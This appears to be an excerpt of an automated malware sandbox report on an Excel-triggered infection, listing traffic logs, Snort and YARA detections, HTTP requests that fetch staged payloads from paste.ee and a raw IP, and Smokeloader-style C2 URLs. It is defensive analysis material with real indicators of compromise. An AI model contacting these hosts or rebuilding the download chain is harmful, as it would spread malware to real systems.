Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 188.114.97.3:443 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 188.114.97.3:443 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2025012 ET TROJAN Powershell commands sent B64 3 188.114.97.3:443 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 188.114.97.3:443 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.22:49176 -> 77.232.129.190:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 77.232.129.190 80	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 188.114.96.3 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Domain query: prolinice.ga

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://prolinice.ga/index.php
Source: Malware configuration extractor	URLs: http://vilendar.ga/index.php

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Yara detected Generic Downloader

Source: Yara match	File source: 12.2.powershell.exe.82d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /8080/RBG.txt HTTP/1.1Host: 198.46.177.156Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 54.241.153.192 54.241.153.192
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: BSTV-ASRU BSTV-ASRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /d/Bo3r4 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nXPJ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8080/lionarekingofjungleimageshere.bmp HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aikpfjvjuwcsxfjs.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1395Host: prolinice.ga

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.177.156

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61AE6F44.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /d/Bo3r4 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /nXPJ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8080/lionarekingofjungleimageshere.bmp HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8080/RBG.txt HTTP/1.1Host: 198.46.177.156Connection: Keep-Alive

Source: wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: z2.ink
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: global traffic	DNS traffic detected: DNS query: prolinice.ga

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aikpfjvjuwcsxfjs.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:13 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 16:35:14 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
